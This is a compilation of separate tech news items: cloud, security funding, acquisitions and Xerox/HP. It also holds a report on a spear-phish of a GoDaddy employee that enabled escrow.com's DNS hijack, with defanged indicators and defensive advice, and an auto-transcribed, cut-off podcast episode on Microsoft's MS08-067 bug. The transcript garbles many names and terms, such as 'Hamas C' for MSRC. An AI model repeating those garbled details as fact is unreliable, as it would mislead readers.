DataStax launches Kubernetes operator for open source Cassandra database

Today, DataStax, the commercial company behind the open source Apache Cassandra project, announced an open source Kubernetes operator developed by the company to run a cloud native version of the database.

When Sam Ramji, chief strategy officer at DataStax, came over from Google last year, the first thing he did was take the pulse of customers, partners and community members around Kubernetes and Cassandra, and they found there was surprisingly limited support.

While some companies had built Kubernetes support themselves, DataStax lacked one to call its own. Given that Kubernetes was born inside Google, and the company has widely embraced the notion of containerization in general, Ramji wanted there to be an operator specifically designed by the company to give customers a general starting point with Kubernetes.

“What’s special about the Kube operator that we’re offering to the community as an option — one of many — is that we have done the work to generalize the operator to Cassandra wherever it might be implemented,” Ramji told TechCrunch.

Ramji says that most companies that have created their own Kubernetes operators tend to specialize for their own particular requirements, which is fine, but as the company built on top of Cassandra, they wanted to come up with a general version that could appeal broader range of use cases.

In Kubernetes, the operator is how the DevOps team packages, manages and deploys an application, giving it the instructions it needs to run correctly. DataStax has created this operator specifically to run Cassandra with a broad set of assumptions.

Cassandra is a powerful database because it stays running when many others fall down. As such it is used by companies as varied as Apple, eBay and Netflix to run their key services. This new Kubernetes implementation will enable anyone who wishes to run Cassandra as a containerized application, helping push it into a modern development realm.

The company also announced a free help service for engineers trying to cope with increased usage on their databases due to COVID-19. They are calling the program, “Keep calm and Cassandra on.” The engineers charged with keeping systems like Cassandra running are called Site Reliability Engineers or SREs.

“The new service is completely free SRE-to-SRE support calls. So our SREs are taking calls from Apache Cassandra users anywhere in the world, no matter what version they’re using if they’re trying to figure out how to keep it up to stand up to the increased demand,” Ramji explained.

DataStax was founded in 2010 and has raised over $190 million, according to PitchBook data.

Axonius nabs $58M for its cybersecurity-focused network asset management platform

As companies get to grips with a wider (and, lately, more enforced) model of remote working, a startup that provides a platform to help track and manage all the devices that are accessing networked services — an essential component of cybersecurity policy — has raised a large round of growth funding. Axonius, a New York-based company that lets organizations manage and track the range of computing-based assets that are connecting to their networks — and then plug that data into some 100 different cybersecurity tools to analyse it — has picked up a Series C of $58 million, money it will use to continue investing in its technology (its R&D offices are in Tel Aviv, Israel) and expanding its business overall.

The round is being led by prolific enterprise investor Lightspeed Venture Partners, with previous backers OpenView, Bessemer Venture Partners, YL Ventures, Vertex, and WTI also participating in the round.

Dean Sysman, CEO and Co-Founder at Axonius, said in an interview that the company is not disclosing its valuation, but for some context, the company has now raised $95 million, and PitchBook noted that in its last round, a $20 million Series B in August 2019, it had a post-money valuation of $110 million.

The company has had a huge boost in business in the last year, however — especially right now, not a surprise for a company that helps enable secure remote working, at a time when many businesses have gone remote in an effort to follow government policies encouraging social distancing to slow the spread of the coronavirus pandemic. As of this month, Axonius has seen customer growth increase 910% compared to a year ago.

Sysman said that this round had been in progress for some time ahead of the announcement being made, but the final stages of closing it were all done remotely last week, which has become something of a new normal in venture deals at the moment.

“We’ve all been staying at home for the last few weeks,” he said in an interview. “The crisis is not helping with deals. It’s making everything more complex for sure. But specifically for us there wasn’t a major difference in the process.”

Sysman said that he first thought of the idea for Axonius when at a previous organization — his experience includes several years with the Israeli Defense Forces, as well as time at a startup called Integrity Project, acquired by Mellanox — where he realised the organization itself, and all of its customers, never actually knew how many devices accessed their network, which is a crucial first step in being able to secure any network.

“Every CIO I met I would ask, do you know how many devices you have on your network? And the answer was either ‘I don’t know,’ or big range, which is just another way of saying, ‘I don’t know,’” Sysman said. “It’s not because they’re not doing their jobs but because it’s just a tough problem.”

Part of the reason, he added, is because IP addresses are not precise enough, and de-duplicating and correlating numbers is a gargantuan task, especially in the current climate of people using not just a multitude of work-provided devices, but a number of their own.

That was what prompted Sysman and his cofounders Ofri Shur and Avidor Bartov to build the algorithms that formed the basis of what Axonius is today. It’s not based on behavioural data as some cybersecurity systems are, but something that Sysman describes as “a deterministic algorithm that knows and builds a unique set of identifiers that can be based on anything, including timestamp, or cloud information. We try to use every piece of data we can.”

The resulting information becomes a very valuable asset in itself that can then be used across a number of other pieces of security software to search for inconsistencies in use (bringing in the behavioural aspect of cybersecurity) or other indicators of malicious activity — specifically following the company’s motto, “Know Your Assets, Identify Gaps, and Automate Security Policy Enforcement” — even as data itself may seem a little pedestrian on its own.

“We like to call ourselves the Toyota Camry of cybersecurity,” Sysman said. “It’s nothing exotic in a world of cutting-edge AI and advanced tech. However it’s a fundamental thing that people are struggling with, and it is what everyone needs. Just like the Camry.”

For now, Axonius is following the route of providing a platform that can interconnect with a number of other security products — currently numbering around 100 — rather than building those tools itself, or acquiring them to bring them in house. That could be one option for how potentially it might evolve over time, however.

For now, the idea of being agnostic to those specific tools and providing a platform just to identify and manage assets is a formula that has already seen a lot of traction with customers — which include companies like Schneider Electric, the New York Times, and Landmark Medical, among others — as well as investors.

“Any enterprise CISO’s top priority, with unwavering consistency, is asset discovery and management. You can’t protect a device if you don’t know it exists.” said Arsham Menarzadeh, general partner at Lightspeed Venture Partners, in a statement. “Axonius integrates into any security and management product to show customers their full asset landscape and automate policy enforcement. Their integrated approach and remediation capabilities position them to become the operating system and single source of truth for security and IT teams. We’re excited to play a part in helping them scale.”

Xage adds full-stack data protection to blockchain security platform

Xage, a startup that has been taking an unusual path to secure legacy companies like oil and gas and utilities with help from the blockchain, announced a new data protection service today.

Xage CEO Duncan Greatwood, says that up until this point, the company has concentrated on protecting customers at the machine layer, but today’s announcement involves protecting data as it travels between parties, which is more of a classic blockchain security scenario.

“We are moving beyond the protection of machines with greater focus on the protection of data. And this announcement around Dynamic Data Security that we’re delivering today is really a data protection layer that spans multiple dimensions. So it spans from the physical machine layer right up to business transaction,” Greatwood explained.

He says that what separates his company from competitors is the ability to have that protection up and down the stack. “We can guarantee the authenticity, integrity and the confidentiality of data, as it’s produced at the machine, and we can maintain that all the way to [delivery to the various parties],” he said.

Greatwood says that this solution is designed to help protect data, even in highly complex data sharing scenarios, using the blockchain as the trust mechanism. Imagine a supply chain scenario in which the parties are sharing data, but each participant only needs to see the piece of data they need to complete their part of the transaction and no more. To do this, Xage has the concept of security fabric, which acts as a layer of protection across the platform.

“What Xage is doing is to use this kind of security outsource approach we bring to authenticity, integrity and confidentiality, and then using the fabric to replicate all of that security metadata across the extent of the fabric, which may very well cover multiple locations and multiple participants,” he said.

This approach enables customers to have confidence in the providence and integrity of the data they are seeing. “We’re able to allow all of the participants to define a set of security policies that gives them control of their own data, but it also allows them to share very flexibly with the rest of the participants in the ecosystem, and to have confidence in that data, up to and including the point where they’ll pay each other money, based on the integrity of the data.”

The new solution is available today. It has been in testing with three beta customers, which included an oil and gas customer, a utility and a smart city scenario.

Xage was founded in 2016 and has raised just over $16 million, according to PitchBook data.

Amid shift to remote work, application performance monitoring is IT’s big moment

In recent weeks, millions have started working from home, putting unheard-of pressure on services like video conferencing, online learning, food delivery and e-commerce platforms. While some verticals have seen a marked reduction in traffic, others are being asked to scale to new heights.

Services that were previously nice to have are now necessities, but how do organizations track pressure points that can add up to a critical failure? There is actually a whole class of software to help in this regard.

Monitoring tools like Datadog, New Relic and Elastic are designed to help companies understand what’s happening inside their key systems and warn them when things may be going sideways. That’s absolutely essential as these services are being asked to handle unprecedented levels of activity.

At a time when performance is critical, application performance monitoring (APM) tools are helping companies stay up and running. They also help track root causes should the worst case happen and they go down, with the goal of getting going again as quickly as possible.

We spoke to a few monitoring vendor CEOs to understand better how they are helping customers navigate this demand and keep systems up and running when we need them most.

IT’s big moment

Microsoft launches Edge Zones for Azure

Microsoft today announced the launch of Azure Edge Zones, which will allow Azure users to bring their applications to the company’s edge locations. The focus here is on enabling real-time low-latency 5G applications. The company is also launching a version of Edge Zones with carriers (starting with AT&T) in preview, which connects these zones directly to 5G networks in the carrier’s data center. And to round it all out, Azure is also getting Private Edge Zones for those who are deploying private 5G/LTE networks in combination with Azure Stack Edge.

In addition to partnering with carriers like AT&T, as well as Rogers, SK Telecom, Telstra and Vodafone, Microsoft is also launching new standalone Azure Edge Zones in more than 10 cities over the next year, starting with LA, Miami and New York later this summer.

“For the last few decades, carriers and operators have pioneered how we connect with each other, laying the foundation for telephony and cellular,” the company notes in today’s announcement. “With cloud and 5G, there are new possibilities by combining cloud services, like compute and AI with high bandwidth and ultra-low latency. Microsoft is partnering with them bring 5G to life in immersive applications built by organization and developers.”

This may all sound a bit familiar, and that’s because only a few weeks ago, Google launched Anthos for Telecom and its Global Mobile Edge Cloud, which at first glance offers a similar promise of bringing applications close to that cloud’s edge locations for 5G and telco usage. Microsoft argues that its offering is more comprehensive in terms of its partner ecosystem and geographic availability. But it’s clear that 5G is a trend all of the large cloud providers are trying to tap into. Microsoft’s own acquisition of 5G cloud specialist Affirmed Networks is yet another example of how it is looking to position itself in this market.

As far as the details of the various Edge Zone versions go, the focus of Edge Zones is mostly on IoT and AI workloads, while Microsoft notes that Edge Zones with Carriers is more about low-latency online gaming, remote meetings and events, as well as smart infrastructure. Private Edge Zones, which combine private carrier networks with Azure Stack Edge, is something only a small number of large enterprise companies would likely to look into, given the cost and complexity of rolling out a system like this.

 

Palo Alto Networks to acquire CloudGenix for $420M

Palo Alto Networks announced today that it has an agreement in place to acquire CloudGenix for $420 million.

CloudGenix delivers a software-defined wide area network (SD-WAN) that helps customers stay secure by setting policies to enforce compliance with company security protocols across distributed locations. This is especially useful for companies with a lot of branch offices or a generally distributed workforce, something just about everyone is dealing with at the moment as we find millions suddenly working from home.

Nikesh Arora, chairman and CEO at Palo Alto Networks, says that this acquisition should contribute to Palo Alto’s “secure access service edge,” or SASE solutions, as it is known in industry parlance.

“As the enterprise becomes more distributed, customers want agile solutions that just work, and that applies to both security and networking. Upon the close of the transaction, the combined platform will provide customers with a complete SASE offering that is best-in-class, easy to deploy, cloud-managed, and delivered as a service,” Arora said in a statement.

CloudGenix was founded 2013 by Kumar Ramachandran, Mani Ramasamy and Venkataraman Anand, all of whom will be joining the company as part of the deal. It has 250 customers across a variety of verticals. The company has raised almost $100 million, according to PitchBook data.

Palo Alto Networks has been on an acquisitive streak. Going back to February 2019, this represents the sixth company it has acquired, to the tune of more than $1.6 billion overall.

The acquisition is expected to close in the fourth quarter, subject to customary regulatory approvals.

Xerox drops $34B HP takeover bid amid COVID-19 uncertainty

Xerox announced today that it would be dropping its hostile takeover bid of HP. The drama began last fall with a flurry of increasingly angry letters between the two companies, and confrontational actions from Xerox, including an attempt to take over the HP board that had rejected its takeover overtures.

All that came crashing to the ground today when Xerox officially announced it was backing down amid worldwide economic uncertainty related to the COVID-19 pandemic. The company also indicated it was dropping its bid to take over the board.

“The current global health crisis and resulting macroeconomic and market turmoil caused by COVID-19 have created an environment that is not conducive to Xerox continuing to pursue an acquisition of HP Inc. (NYSE: HPQ) (‘HP’). Accordingly, we are withdrawing our tender offer to acquire HP and will no longer seek to nominate our slate of highly qualified candidates to HP’s Board of Directors,” the company said in a statement.

As for HP, it said it was strong financially and would continue to drive shareholder value, regardless of the outcome:

We remain firmly committed to driving value for HP shareholders. HP is a strong company with market leading positions across Personal Systems, Print, and 3D Printing & Digital Manufacturing. We have a healthy cash position and balance sheet that enable us to navigate unanticipated challenges such as the global pandemic now before us, while preserving strategic optionality for the future.

The bid never made a lot of sense. Xerox is a much smaller company, with a market cap of around $4 billion compared with HP with a market cap of almost $25 billion. It was truly a case of the canary trying to eat the cat.

Yet Xerox continued to insist today, even while admitting defeat, that it would have been better to combine the two companies, something HP never felt was realistic. HP questioned the ability of Xerox to come up with such a large sum of money, and, if it did, would it be financially stable enough to pull off a deal like this.

Yet even as recently as last month, Xerox increased the bid from $22 to $24 per share in an effort to entice shareholders to bite. It had previously threatened to bypass the board and go directly to shareholders before attempting to replace the board altogether.

HP didn’t like the hostility inherent in the bid or any of the subsequent moves Xerox made to try to force a deal. Last month, HP offered its investors billions in give-backs in an effort to convince them to reject the Xerox bid. As it turned out, the drama simply fizzled out in the middle of a worldwide crisis.

Phish of GoDaddy Employee Jeopardized Escrow.com, Among Others

A spear-phishing attack this week hooked a customer service employee at GoDaddy.com, the world’s largest domain name registrar, KrebsOnSecurity has learned. The incident gave the phisher the ability to view and modify key customer records, access that was used to change domain settings for a half-dozen GoDaddy customers, including transaction brokering site escrow.com.

Escrow.com helps people safely broker all sorts of transactions online (ironically enough, brokering domain sales is a big part of its business). For about two hours starting around 5 p.m. PT Monday evening, Escrow.com’s website looked radically different: Its homepage was replaced with a crude message in plain text:

The profanity-laced message left behind by whoever briefly hijacked the DNS records for escrow.com. Image: Escrow.com

DomainInvesting.com’s Elliot Silver picked up on the change and got a statement from Matt Barrie, the CEO of freelancer.com, which owns escrow.com.

“During the incident, the hackers changed the DNS records for Escrow.com to point to to a third party web server,” Barre wrote, noting that his security team managed to talk to the hacker responsible for the hijack via telephone.

Barrie said escrow.com would be sharing more details about the incident in the coming days, but he emphasized that no escrow.com systems were compromised, and no customer data, funds or domains were compromised.

KrebsOnSecurity reached out to Barrie and escrow.com with some follow-up questions, and immediately after that pinged Chris Ueland, CEO of SecurityTrails, a company that helps customers keep track of their digital assets.

Ueland said after hearing about the escrow.com hack Monday evening he pulled the domain name system (DNS) records for escrow.com and saw they were pointing to an Internet address in Malaysia — 111.90.149[.]49 (that domain is hobbled here because it is currently flagged as hosting a phishing site). The attacker also obtained free encryption certificates for escrow.com from Let’s Encrypt.

Running a reverse DNS lookup on this 111.90.149[.]49 address shows it is tied to fewer than a dozen domains, including a 12-day-old domain that invokes the name of escrow.com’s registrar — servicenow-godaddy[.]com. Sure enough, loading that domain in a browser reveals the same text that appeared Monday night on escrow.com, minus the redaction above.

The message at servicenow-godaddy[.]com was identical to the one displayed by escrow.com while the site’s DNS records were hacked.

It was starting to look like someone had gotten phished. Then I heard back from Matt Barrie, who said it wasn’t anyone at escrow.com that got phished. Barrie said the hacker was able to read messages and notes left on escrow.com’s account at GoDaddy that only GoDaddy employees should have been able to see.

Barrie said one of those notes stated that certain key changes for escrow.com could only be made after calling a specific phone number and receiving verbal authorization. As it happened, the attacker went ahead and called that number, evidently assuming he was calling someone at GoDaddy.

In fact, the name and number belonged to escrow.com’s general manager, who played along for more than an hour talking to the attacker while recording the call and coaxing information out of him.

“This guy had access to the notes, and knew the number to call,” to make changes to the account, Barrie said. “He was literally reading off the tickets to the notes of the admin panel inside GoDaddy.”

A WHOIS lookup on escrow.com Monday evening via the Windows PowerShell built into Windows 10. Image: SecurityTrails

In a statement shared with KrebsOnSecurity, GoDaddy acknowledged that on March 30 the company was alerted to a security incident involving a customer’s domain name. An investigation revealed a GoDaddy employee had fallen victim to a spear-phishing attack, and that five other customer accounts were “potentially” affected — although GoDaddy wouldn’t say which or how many domains those customer accounts may have with GoDaddy.

“Our team investigated and found an internal employee account triggered the change,” the statement reads. “We conducted a thorough audit on that employee account and confirmed there were five other customer accounts potentially impacted.”

The statement continues:

“We immediately locked down the impacted accounts involved in this incident to prevent further changes. Any actions done by the threat actor have been reverted and the impacted customers have been notified. The employee involved in this incident fell victim to a spear-fishing or social engineering attack. We have taken steps across our technology, processes and employee education, to help prevent these types of attacks in the future.”

There are many things domain owners can and should do to minimize the chances that domain thieves can wrest control over a business-critical domain, but much of that matters little if and when someone at your domain name registrar gets phished or hacked.

But increasingly, savvy attackers are focusing their attention on targeting people at domain registrars, and at their support personnel. In January, KrebsOnSecurity told the harrowing story of e-hawk.net, an online fraud prevention and scoring service that had its domain name fraudulently transferred to another provider after someone social engineered a customer service representative at e-hawk’s registrar.

Nation-state level attackers also are taking a similar approach. A massive cyber espionage campaign targeting a slew of domains for government agencies across the Middle East region between 2018 and 2019 was preceded by a series of targeted attacks on domain registrars and Internet infrastructure firms that served those countries.

While there is very little you can do to prevent your domain registrar from getting phished or tricked by scammers, there are several precautions that you can control. For maximum security on your domains, consider adopting some or all of the following best practices:

-Use 2-factor authentication, and require it to be used by all relevant users and subcontractors.

-In cases where passwords are used, pick unique passwords and consider password managers.

-Review the security of existing accounts with registrars and other providers, and make sure you have multiple notifications in place when and if a domain you own is about to expire.

-Use registration features like Registry Lock that can help protect domain name records from being changed. Note that this may increase the amount of time it takes going forward to make key changes to the locked domain (such as DNS changes).

-Use DNSSEC (both signing zones and validating responses).

-Use access control lists for applications, Internet traffic and monitoring.

-Monitor the issuance of new SSL certificates for your domains by monitoring, for example, Certificate Transparency Logs.

Darknet Diaries | MS08-067 | What Happens When Microsoft Discovers a Major Vulnerability within Windows

Listen to what goes on internally when Microsoft discovers a major vulnerability within Windows. This is the story of what happened when Microsoft found a massive bug in Windows which paved the way for the largest worm in history. Guest John Lambert gives the inside story to Jack Reciter.

This episode is sponsored by SentinelOne. To learn more about our endpoint security solutions and get a 30-day free trial, visit sentinelone.com/darknetdiaries.

Enjoy!

Darknet Diaries | MS08-067 | What Happens When Microsoft Discovers a Major Vulnerability within Windows

Darknet Diaries | MS08-067 | What Happens When Microsoft Discovers a Major Vulnerability within Windows was automatically transcribed by Sonix with the latest audio-to-text algorithms. This transcript may contain errors. Sonix is the best audio automated transcription service in 2020. Our automated transcription algorithms works with many of the popular audio file formats.

Hey, it’s Jack. Host of the show. Let me ask you a question. Whose job is it to keep the roads you drive on safe? Is it the drivers sole responsibility? What about the car makers? Are they responsible for keeping the roads safe for other drivers? What about the cops? Maybe they need to come by and watch everyone to make sure they’re obeying the law and keeping everyone safe away. Maybe it’s the job of the civil engineers, the people who design the roads. I mean, a crazy, curvy, bumpy road with the speed limit of 100 miles per hour is obviously not safe. So must be their job to design it to be as safe as possible. Right. So whose job is it to keep the roads safe?

All these people, we need drivers to drive safe. We need cars to be built with safety in mind. And we need cops to catch people who aren’t being safe. And we need civil engineers to design us safe roads. And I think this analogy applies to keeping our networks and computers safe, too. We need users to be smart at what they click on and do. And we need software makers to design the software to be secure. And we need the cops to arrest people when they break the law. And we need groups who set up industry standards that guide us to safety. We cannot rely on one person to keep our networks safe. It takes all these people to always be vigilant, to keep our computers safe.

And this is a story about what happens when software maker finds a bug in their own software. And what those effects were. Specifically, this is a story about when Microsoft found a massive bug in Windows which paved the way for the largest worm in history.

These are true stories from the dark side of the Internet.

I’m Jack Reciter. This is Darknet Diaries.

Support for this episode comes from SentinelOne. It’s all too common. A family member or colleague calls asking for help because some kind of ransomware has infected their computer. Bummer. Now imagine this on the scale of an entire organization. This is exactly what set in a one was built to prevent and solve. Besides the ability to prevent ransomware and even rollback ransomware if it is encrypted, Sentinel 1 also has a ransomware warrantee. Visibility in each of these endpoints is available from an easy to use console, allowing security teams to be more efficient without the need to hire more and more people on top of that. Certainly one offers threat hunting, visibility and remote administration tools to manage and protect any IAPT devices connected to your network with Sentinel One. You can replace many products with one if you’re a CSO, a security leader or I.T. manager in the enterprise. Don’t settle to live in the past. Get a personalized demo and a 30 day free trial that allows you to see the benefits up close and personal. Go to SentinelOne. One dot com slash darknet diaries for your free demo.

Your Cyber Security Future starts today with Sentinel One.

I’m very excited about this episode because I think this is a rare story to hear. We aren’t going to hear from the hacker who found the exploit and we aren’t gonna hear from the company who got hacked by this exploit. Instead, we’re gonna go right to the source to hear the story of one of the most notorious bugs ever, right from the horse’s mouth. Microsoft.

Hello. Hey, Jack, can you hear me? Yeah, I hear you pretty well. What kind of Mike are using?

This is a headset. It’s this sexually made by Microsoft. This is John Lambert. My name is John Lambert and I work at Microsoft.

He’s been with Microsoft a long time while he was there. He’s spent 10 years working on a team called the Trustworthy Computing Group.

So that was a group that was created after the early worms of Code Red named Blaster Slammer. And it was designed to help improve customer trust in Microsoft products by fortifying them from a security, privacy and reliability perspective. The domain I worked in was security. And so a lot of that focus was on finding and eliminating vulnerabilities and designing and coding from the from the products and working across the Microsoft sort of products. We not just Windows or Office, but all of the products to sort of build the techniques that security researchers had had familiarity with and then inculcating that sort of ethos. And Know-How inside of the Microsoft development cycle.

Well, what an interesting role to how right. His mission is to improve the trust people have in Microsoft products by making them more secure. And I just looked this up in 2008. Microsoft had ninety one thousand employees with that many employees. Yeah, I guess it makes sense to make a team to improve the trust of their products. Oh, and in case you’re wondering, in 2019, they had one hundred and forty four thousand employees. Now, of course, the biggest Microsoft product that John would work with is Windows, the operating system itself. John got the ability to examine Windows in unique ways by looking at the source code and building relationships with developers and conducting security tests against it. It’s not really his job to make sure all the bugs are squashed or to find the bugs, but he was certainly involved in getting all the teams together to help find the bugs and get them fixed. Okay. Now, when the team at Microsoft finds a bug in Windows, they give it to the developers who then work on a fix and create a patch for it.

And they issued these patches on Tuesdays, every patch Tuesday, which is every second Tuesday of the month, that we will create a number of security bulletins. The bulletins essentially are are the advisory that describes. Here are the vulnerabilities that we are fixing and say Internet Explorer or Windows or Office. And every bulletin may have one or more vulnerabilities that is being fixed. Those have individual CVG identifiers that security press professionals sort of are familiar with. But the bulletin is essentially a grouping of them for a product.

And the bulletin is rated, you know, critical, important, moderate level of severity.

Now, these advisory bulletins put out on Patch Tuesday might have a name like m._s 0 7 Dash 0 2 9 or M.S. 0 8 dash 0 6 7. And if you see something like this, a mass 0 7 0 2 9, it means the advisory was published in 2007 and it was the twenty ninth advisory of the year.

So for this story, we’re gonna be talking about the security bulletin, M.S. 0 8 dash 0 6 7, which means we’re talking about this bug, which was founded in 2008. Vista had just come out the year before, but its adoption rate wasn’t that strong. So the majority of Microsoft Windows customers were using Windows XP still. And take a guess at how many lines of code it took to create Windows XP, already 45 million lines of code.

And of course, that was spread out among many teams trying to keep a program that big bug free is, well, in my opinion, impossible. It’s just way too big to keep a bug free. There has to be some function of routine in the code that didn’t get tested properly or coded properly and has a glaring bug, or sometimes it gets tested and coded properly. But there’s a bug that’s not so glaring in there. It only appears under weird circumstances like only when the memory is filled and it’s only a certain millisecond on a certain time of day. Weird stuff happens when you have a code base that big. And all this is to say because Windows XP was 45 million lines of code long just by that size alone, it must have had a lot of bugs. But before we get an M.S. 0 8 0 6 7, maybe we should talk about a bug found the year before called M.S. 0 7 0 2 9.

Okay. So that MSO 7 0. Twenty nine was a very important. It was sort of. Moment of insight, if you will, for all the things that came after it. What MSO 7 0 2 9 was, that was a bulletin that corrected a vulnerability with Windows DNS and that when Microsoft became aware of it, a customer that was being exploited in the wild contacted us and said somehow we just got attacked. Here is an attack tool that we were able to find associated with it. We think it’s exploiting a vulnerability somehow and that goes into msra. See?

Hamas C is the Microsoft Security Response Center. This is the team of security professionals within Microsoft that is in charge of making Windows secure and looking for bugs and getting them fixed. They took this report. They got and tested it to see if you could hack into a fully updated Windows computer with it. And it worked.

And then they investigated and found this zero-day and Windows DNS that is being used. They put out an advisory. They put out a bulletin. And what I was doing as I was looking at this sort of crash dump system that Microsoft has this Windows error reporting. And I was working with some engineers that were looking at the crash reports coming in associated with Windows DNS. The DNS product was otherwise very reliable and hardly ever crashed. And so the only crashes coming in at that point when we looked at them were actually attacks in the wild.

And when we started to examine them, we could tell that actually we could have known about this attack in the wild much earlier than the customer contacting us. If only we’d been able to pull these needles out of the massive haystack of crashes coming into Microsoft, different used Windows or Internet Explorer or Microsoft Word.

And the app suddenly crashes and it says, do you want to send the crash data to Microsoft? This is what’s known as WCR were.

Yeah. So Windows error reporting were. It’s also known internally as Dr. Watson. It’s really a technology that goes back to the late 90s. Both office and Windows were independently working on how do we get better data on how the products are crashing before we ship them. And then after we shipped them. Other than customers calling customer support, how do we get data about how they’re faring in the wild? And so both office and Windows had built features to collect crash reports at scale that could be automatically submitted by customers and then run analysis tools against them to try to root cause and bukkit them to say, OK, is this a new bug we don’t know about or is this an existing bug that we do know about happening again? And those two efforts came together and that feature was built into windows and that was called Windows Error Reporting.

So yeah, that little box that pops up when app crashes will ask you if you want to send the crash report to Microsoft.

And if they say yes, then that communicates with Microsoft and the backend system decides, is this something we already know about or is this something new? And if it’s new, it starts to prompt the user to potentially upload more data so we can root cause the issue further.

Now, remember, I said that XP had 45 million lines of code and a program that big is impossible to be bug free. And yet I don’t think it’s like just a dozen bugs in a program that big. And I don’t even think it’s just hundreds of bugs or thousands of bugs. I think there’s more like tens of thousands of bugs in a program with 45 million lines of code in it at the same time. Windows was installed on a billion computers in 2008. So Microsoft was seeing millions of crashed dumps a day from these computers. So let’s try to be a project manager for a second here and come up with a strategy to tackle these millions of trash dumps a day. We have a few options. First, let’s just filter out all the known bugs we’ve already fixed. People’s computers are crashing, but they just need to patch it and it won’t crash anymore. OK, that’s out of the way. But now when we try to prioritize what to look at next, it’s not so easy. It might make sense to tackle the bugs that show up the most, but these might be very low severity. Maybe not as important. Maybe there’s something with a more high severity, but not as many crash reports. So then you might decide to look at the highest severity crash reports instead. Or maybe some apps are more important than others. Like if Ms. Paint crashes, it might not be as big of a deal as if the whole computer was crashing. Or maybe you can look at the easiest to fix problems first. Get those out of the way. It’s really hard to know what to prioritize here. So this might give you a better understanding of how hard it would be to look through millions of crash reports a day to figure out what to fix first. But it was still very important for Microsoft to collect these dumps and analyze them at this time in 2007. John was starting to look at these crash reports to try to make sense of them.

They go up to a massive automated system. These tools run against them at scale and a completely headless way. They are sort of bucketed and bend in a way that makes it easy for engineers to know. Is there something new coming along or how active? How prevalent is this issue of wide variety of engineers across the company? If you know, if you work on office, you look in the office, crash buckets and see what is hot for you there. If you work in windows or any other product, you can kind of see how is my product crashing? So engineers across the company were using this to fix bugs. And then like, for example, in Windows Vista from the trustworthy computing side, they did all kinds of static analysis tools to find and remove reliability issues.

And I think they fixed one hundred thousand bugs through those efforts and through Windows reporting. They found another 5000 bugs that had escaped all of those processes that they went in fix. And so every service pack, every new product from Microsoft has is more reliable because they’re finding and fixing all these bugs that are manifesting in the wild. I was there kind of on the side saying this is a fascinating telemetry system. How do we look at this from a security point of view?

Said a hundred thousand bugs.

One hundred thousand. Changes to the product that were done because of not all of those are bugs. One way to think about as there’s no coding practices that are sort of outdated. Developers will know about these things is like calling these unsafe string functions like stir copy and so forth. And instead of trying to figure out which ones are vulnerabilities, which ones are not, they said let’s just go remove all of them from the product. And so that’s a massive amount of code changes. You know, many of those are not bugs. Many of those are not vulnerabilities.

But it’s an easy way to just go to go say, look, we’re gonna have a new standard of engineering where to go get rid of that whole class of thing by tackling that. So that’s an example of some of those changes. Yeah. Yeah. But I mean, are you exaggerating when you say one hundred thousand or. No. No.

Cheese. Can you imagine trying to keep something like this secure? To fix a hundred thousand things in the code just sounds like madness to try to complete. I guess this is why they needed ninety one thousand Microsoft employees to tackle huge issues like this. These crash reports were really helping them identify the problems that needed fixing. But even though these might be bugs, they might not all be security problems. Like if you click print and nothing happens. That might be a bug in the code. But is it really a security issue? A hacker probably can’t use that to take control of your computer or hack you. But John was looking at this and wondering if there is anything in these crash reports. That is something a hacker could use or maybe signs that a hacker caused a crash.

Some vulnerabilities are discovered by attackers and exploded in the wild before. Microsoft is aware of them. And how could we go find that before customers contact us? And we there are a lot of reasons that exploits actually fail in practice. And that was that was the idea, which is instead of trying to find exploits when they’re working, sometimes they don’t. And there’s a bunch of interesting reasons why they don’t. And by studying the causes of failure of those exploits in the wild, that would lead us to potentially discover them. Some of the reasons they fail are because the exploit was written for, say, an English language version of Windows and it’s run on a Chinese language version and they’re slightly different internally. So for a wide variety of reasons, that exploits would fail in practice. And I studied extensively all the different patterns of how they fail because that was what I needed to be able to understand.

To find them, the hunt was on for John. He wanted to find traces of hackers in the WCR logs. But like I was saying, there are millions of error logs a day. This wasn’t gonna be easy.

Yeah, I mean, I think back then it was over a billion a month and recognize it. It’s like how could you look through a billion a month because of the way Windows report buckets the issues. You don’t have to look at every single one, one by one. You’re really trying to find new ones, new ones that are interesting in a different way. And then another way to think about it is there’s only a certain number of ways that zero days are going to kind of show up and effect an application. And so, you know, people can send malicious documents that’ll crash words. A word is interesting to look at. People can send experts with the browser. So Internet Explorer would be interesting to look at. And then if you think about even inside of Microsoft Word, if an attack is going to happen, likely it’s going to happen when the user is first opening the document. You know, it’s rare that some exploit is designed to work when the user spit in word for an hour and they finally click tools, options, spell check, add in and then it goes, boom. Those are not the paths where an exploit is going to work. It’s gonna be in the file open code pad. So that further narrowed down the places that we needed to look at. Then exploits fail and certain specific patterns that are the kind of patterns that we sort of knew to go sifting over. So we’re able to work that funnel down from a billion reports a month to, you know, millions that seemed interesting to hundreds of thousands that had no other clues in them and so forth and whittled the funnel down.

John dedicated a lot of time to try to find this unknown vulnerability that some hacker was exploiting.

And when we come back from the break, John finds something that he’ll never forget.

Working remotely can be a challenge, especially for teams that are new to it. How do you deal with your work environment being the same as home while staying connected and productive? And then there’s your newest co-worker, the cat. Well, your friends at Trello have been powering remote teams globally for almost a decade, at a time when teams must come together more than ever to solve big challenges. Trello is here to help. Trello part of Atlassian is Collaborative Suite as an app with an easy to understand visual format, plus tons of features that make working with your team functional and just plain fun. Chelo keeps everyone organized and on the same page, helping teams communicate, focus and connect teams of all shapes and sizes at companies like Google, Fender, Costco and likely your favorite neighborhood coffee shop. All use Trello to collaborate and get work done. Try Trello for free and learn more at Trello dot com. That’s tr e-l l’eau dot com. Trello dot com.

On September 25th, I remember opening a crash report in for the service HHoS process that we have seen many millions of crash reports for already, because a couple of years earlier there was this other vulnerability MSO 6 0:40 that had been adopted by bots and worms to spread and it was causing millions of crashes against machines that had not put on that patch. But this one was a little different.

